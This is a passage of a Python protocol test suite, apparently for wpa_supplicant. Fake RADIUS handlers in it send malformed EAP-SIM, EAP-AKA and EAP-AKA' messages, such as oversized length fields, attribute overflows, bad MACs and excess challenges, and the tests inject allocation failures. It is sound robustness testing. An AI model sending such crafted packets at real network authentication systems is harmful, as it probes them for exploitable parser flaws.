EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_MAC, 5, 0, 1, 2, 3, 4,
EAP_SIM_AT_RAND, 5, 0, 5, 6, 7, 8,
EAP_SIM_AT_AUTN, 5, 0, 9, 10,
0x2fda8ef7, 0xbba518cc)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge - Invalid MAC")
return struct.pack(">BBHBBHBBHBBBBBBHBBH4LBBH4LBBH4L",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4 + 20 + 20 + 20,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_MAC, 5, 0, 1, 2, 3, 4,
EAP_SIM_AT_RAND, 5, 0, 5, 6, 7, 8,
EAP_SIM_AT_AUTN, 5, 0, 0xffffffff, 0xffffffff,
0xd1f90322, 0x40514cb4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge - Valid MAC")
return struct.pack(">BBHBBHBBHBBBBBBHBBH4LBBH4LBBH4L",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4 + 20 + 20 + 20,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_MAC, 5, 0,
0xf4a3c1d3, 0x7c901401, 0x34bd8b01, 0x6f7fa32f,
EAP_SIM_AT_RAND, 5, 0, 5, 6, 7, 8,
EAP_SIM_AT_AUTN, 5, 0, 0xffffffff, 0xffffffff,
0xd1f90322, 0x40514cb4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_KDF_INPUT length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_KDF_INPUT, 2, 0xffff, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_KDF length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_KDF, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with large number of KDF proposals")
return struct.pack(">BBHBBHBBHBBHBBHBBHBBHBBHBBHBBHBBHBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 12 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254,
EAP_SIM_AT_KDF, 1, 253,
EAP_SIM_AT_KDF, 1, 252,
EAP_SIM_AT_KDF, 1, 251,
EAP_SIM_AT_KDF, 1, 250,
EAP_SIM_AT_KDF, 1, 249,
EAP_SIM_AT_KDF, 1, 248,
EAP_SIM_AT_KDF, 1, 247,
EAP_SIM_AT_KDF, 1, 246,
EAP_SIM_AT_KDF, 1, 245,
EAP_SIM_AT_KDF, 1, 244)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
return None
srv = start_radius_server(aka_prime_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
for i in range(0, 16):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="AKA'", identity="6555444333222111",
password="5122250214c33e723a5dd523fc145fc0:981d464c7c52eb6e5036234984ad0bcf:000000000123",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
if i in [ 0 ]:
time.sleep(0.1)
else:
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
timeout=10)
if ev is None:
raise Exception("Timeout on EAP failure")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
finally:
stop_radius_server(srv)
def test_eap_proto_sim(dev, apdev):
"""EAP-SIM protocol tests"""
def sim_handler(ctx, req):
logger.info("sim_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_SIM)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected AT_AUTN")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_AUTN, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short AT_VERSION_LIST")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: AT_VERSION_LIST overflow")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 1, 0xffff)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected AT_AUTS")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_AUTS, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected AT_CHECKCODE")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_CHECKCODE, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No AT_VERSION_LIST in Start")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No support version in AT_VERSION_LIST")
return struct.pack(">BBHBBHBBH4B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 3, 2, 3, 4, 5)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request without ID type")
return struct.pack(">BBHBBHBBH2H", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID (duplicate)")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request FULLAUTH_ID")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request FULLAUTH_ID (duplicate)")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request FULLAUTH_ID")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request PERMANENT_ID")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_PERMANENT_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request PERMANENT_ID (duplicate)")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_PERMANENT_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No AT_MAC and AT_RAND in Challenge")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CHALLENGE, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No AT_RAND in Challenge")
return struct.pack(">BBHBBHBBH4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 20,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Insufficient number of challenges in Challenge")
return struct.pack(">BBHBBHBBH4LBBH4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 20 + 20,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_RAND, 5, 0, 0, 0, 0, 0,
EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too many challenges in Challenge")
return struct.pack(">BBHBBHBBH4L4L4L4LBBH4L", EAP_CODE_REQUEST,
ctx['id'],
4 + 1 + 3 + 4 + 4 * 16 + 20,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_RAND, 17, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0,
EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Same RAND multiple times in Challenge")
return struct.pack(">BBHBBHBBH4L4L4LBBH4L", EAP_CODE_REQUEST,
ctx['id'],
4 + 1 + 3 + 4 + 3 * 16 + 20,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_RAND, 13, 0, 0, 0, 0, 0, 0, 0, 0, 1,
0, 0, 0, 0,
EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification with no attributes")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification indicating success, but no MAC")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 32768)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification indicating success, but invalid MAC value")
return struct.pack(">BBHBBHBBHBBH4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 20,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 32768,
EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification before auth")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 16384)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification before auth")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 16385)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification with unrecognized non-failure")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 0xc000)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification before auth (duplicate)")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 0xc000)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Re-authentication (unexpected) with no attributes")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_REAUTHENTICATION,
0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Client Error")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CLIENT_ERROR, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unknown subtype")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SIM, 255, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
return None
srv = start_radius_server(sim_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
for i in range(0, 25):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SIM", identity="1232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
if i in [ 0 ]:
time.sleep(0.1)
else:
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
timeout=10)
if ev is None:
raise Exception("Timeout on EAP failure")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
finally:
stop_radius_server(srv)
def test_eap_proto_sim_errors(dev, apdev):
"""EAP-SIM protocol tests (error paths)"""
check_hlr_auc_gw_support()
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0]['ifname'], params)
with alloc_fail(dev[0], 1, "eap_sim_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SIM", identity="1232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with fail_test(dev[0], 1, "os_get_random;eap_sim_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SIM", identity="1232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SIM", identity="1232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581")
with fail_test(dev[0], 1, "aes_128_cbc_encrypt;eap_sim_response_reauth"):
hapd.request("EAPOL_REAUTH " + dev[0].own_addr())
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
if ev is None:
raise Exception("EAP re-authentication did not start")
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SIM", identity="1232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581")
with fail_test(dev[0], 1, "os_get_random;eap_sim_msg_add_encr_start"):
hapd.request("EAPOL_REAUTH " + dev[0].own_addr())
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
if ev is None:
raise Exception("EAP re-authentication did not start")
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SIM", identity="1232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581")
with fail_test(dev[0], 1, "os_get_random;eap_sim_init_for_reauth"):
hapd.request("EAPOL_REAUTH " + dev[0].own_addr())
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
if ev is None:
raise Exception("EAP re-authentication did not start")
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SIM", identity="1232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581")
with alloc_fail(dev[0], 1, "eap_sim_parse_encr;eap_sim_process_reauthentication"):
hapd.request("EAPOL_REAUTH " + dev[0].own_addr())
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
if ev is None:
raise Exception("EAP re-authentication did not start")
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
tests = [ (1, "eap_sim_verify_mac;eap_sim_process_challenge"),
(1, "eap_sim_parse_encr;eap_sim_process_challenge"),
(1, "eap_sim_msg_init;eap_sim_response_start"),
(1, "wpabuf_alloc;eap_sim_msg_init;eap_sim_response_start"),
(1, "=eap_sim_learn_ids"),
(2, "=eap_sim_learn_ids"),
(2, "eap_sim_learn_ids"),
(3, "eap_sim_learn_ids"),
(1, "eap_sim_process_start"),
(1, "eap_sim_getKey"),
(1, "eap_sim_get_emsk"),
(1, "eap_sim_get_session_id") ]
for count, func in tests:
with alloc_fail(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SIM", identity="1232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581",
erp="1", wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
tests = [ (1, "aes_128_cbc_decrypt;eap_sim_parse_encr") ]
for count, func in tests:
with fail_test(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SIM", identity="1232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
params = int_eap_server_params()
params['eap_sim_db'] = "unix:/tmp/hlr_auc_gw.sock"
params['eap_sim_aka_result_ind'] = "1"
hostapd.add_ap(apdev[1]['ifname'], params)
with alloc_fail(dev[0], 1,
"eap_sim_msg_init;eap_sim_response_notification"):
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP",
scan_freq="2412",
eap="SIM", identity="1232010000000000",
phase1="result_ind=1",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
tests = [ "eap_sim_msg_add_encr_start;eap_sim_response_notification",
"aes_128_cbc_encrypt;eap_sim_response_notification" ]
for func in tests:
with fail_test(dev[0], 1, func):
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP",
scan_freq="2412",
eap="SIM", identity="1232010000000000",
phase1="result_ind=1",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581")
dev[0].request("REAUTHENTICATE")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=5)
if ev is None:
raise Exception("EAP method not started on reauthentication")
time.sleep(0.1)
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
tests = [ "eap_sim_parse_encr;eap_sim_process_notification_reauth" ]
for func in tests:
with alloc_fail(dev[0], 1, func):
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP",
scan_freq="2412",
eap="SIM", identity="1232010000000000",
phase1="result_ind=1",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581")
dev[0].request("REAUTHENTICATE")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=5)
if ev is None:
raise Exception("EAP method not started on reauthentication")
time.sleep(0.1)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
def test_eap_proto_aka_errors(dev, apdev):
"""EAP-AKA protocol tests (error paths)"""
check_hlr_auc_gw_support()
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0]['ifname'], params)
with alloc_fail(dev[0], 1, "eap_aka_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="AKA", identity="0232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581:000000000123",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "=eap_aka_learn_ids"),
(2, "=eap_aka_learn_ids"),
(1, "eap_sim_parse_encr;eap_aka_process_challenge"),
(1, "wpabuf_dup;eap_aka_add_id_msg"),
(1, "wpabuf_resize;eap_aka_add_id_msg"),
(1, "eap_aka_getKey"),
(1, "eap_aka_get_emsk"),
(1, "eap_aka_get_session_id") ]
for count, func in tests:
with alloc_fail(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="AKA", identity="0232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581:000000000123",
